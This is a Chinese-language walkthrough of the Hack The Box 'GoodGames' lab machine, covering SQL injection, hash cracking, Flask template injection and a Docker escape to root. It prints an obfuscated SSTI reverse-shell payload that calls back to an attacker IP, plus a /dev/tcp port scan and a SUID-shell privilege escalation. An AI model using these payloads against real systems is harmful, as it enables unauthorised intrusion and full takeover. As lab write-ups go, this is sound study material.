HTB-GoodGames-WriteUp

2025-03-28 2 0

1、使用nmap简单扫描一下目标ip,开启了80端口,访问一下试试

HTB-GoodGames-WriteUp插图

2、发现有个登录的地方,使用sqlmap尝试一下sql注入

HTB-GoodGames-WriteUp插图1

3、存在注入点,直接使用sqlmap注入获取信息,得到了admin的用户信息

HTB-GoodGames-WriteUp插图2

发现密码是md5加密的,使用md5查询工具查询一下,密码是superadministrator

HTB-GoodGames-WriteUp插图3

4、使用admin@goodgames.htb/superadministrator登录,点击右上角设置,发现了一个新的url,将这个url加入hosts解析

HTB-GoodGames-WriteUp插图4

HTB-GoodGames-WriteUp插图5

5、加入解析后,再次访问这个页面,发现是一个flask后台(可能会考察flask模板注入),使用admin/superadministrator登录

HTB-GoodGames-WriteUp插图6

HTB-GoodGames-WriteUp插图7

6、登录后台后,开始进行信息收集,发现后台的net task、search交互都只是纯前端的东西,没有什么实际内容,查看settings时,发现有个用户名修改的地方,使用{{7*7}}尝试是否存在ssti模板注入

HTB-GoodGames-WriteUp插图8

7、通过模板注入点进行反弹shell

{{config.**class**.**init**.**globals**['os'].popen('bash -c "$(echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xOS8xMjM0IDA+JjEK | base64 -d)"').read()}}

8、拿到反弹shell后,发现是一个root权限?这种情况可以考虑目前所处于docker容器里面,返回到根目录,发现存在dockerenv文件,判断目前处于docker容器

HTB-GoodGames-WriteUp插图9

9、进入home目录,发现存在一个用户angustus,这个文件夹里面有一个user的flag,使用ls -alh查看发现有些文件不属于root?很有可能是因为docker容器的该目录是从宿主机目录挂载过来的

HTB-GoodGames-WriteUp插图10

使用mount命令查看,存在挂载

HTB-GoodGames-WriteUp插图11

10、使用ifconfig发现存在一个网卡eth0, Docker 通常在默认配置中将子网的第一个地址分配给主机系统,因此 172.19.0.1 可能是主机的内部 Docker IP 地址。

11、我们可以编写一个shell脚本,然后在这个shell脚本上扫描该ip地址,但是首先,我们需要将当前的终端进行升级(这里使用python建立伪终端即可)

python -c 'import pty; pty.spawn("/bin/bash")’

for PORT in {0..1000}; do timeout 1 bash -c "</dev/tcp/172.19.0.1/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done

12、发现这个ip地址上存在22端口开发,我们尝试使用augustus这个账户进行连接,成功登录

ssh [augustus@172.19.0.1](mailto:augustus@172.19.0.1)

HTB-GoodGames-WriteUp插图12

13、使用hostname查看内网所有主机,发现目标docker机器IP地址

HTB-GoodGames-WriteUp插图13

14、查看/home/Augustus下面的文件,发现和之前在docker里面的文件信息一致,我们可以考虑将docker容器的具有root权限的/bin/sh文件放入该文件夹下面,然后赋予SUID权限,然后我们的普通用户就可以获得root权限

HTB-GoodGames-WriteUp插图14

15、再次通过ssh连接到宿主机,执行bash得到一个新的shell,并且该shell具有root权限


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

新型安卓恶意软件利用 .NET MAUI 框架逃避检测
新型VanHelsing勒索软件瞄准Windows、ARM和ESXi系统
Vulnhub靶场——Tr0ll
[Meachines] [Medium] Lazy Padding-Oracle+AES_CBC+路径劫持权限提升
网络安全解析:你的数据是如何流入暗网的?
2025年3月三大网络攻击事件盘点

发布评论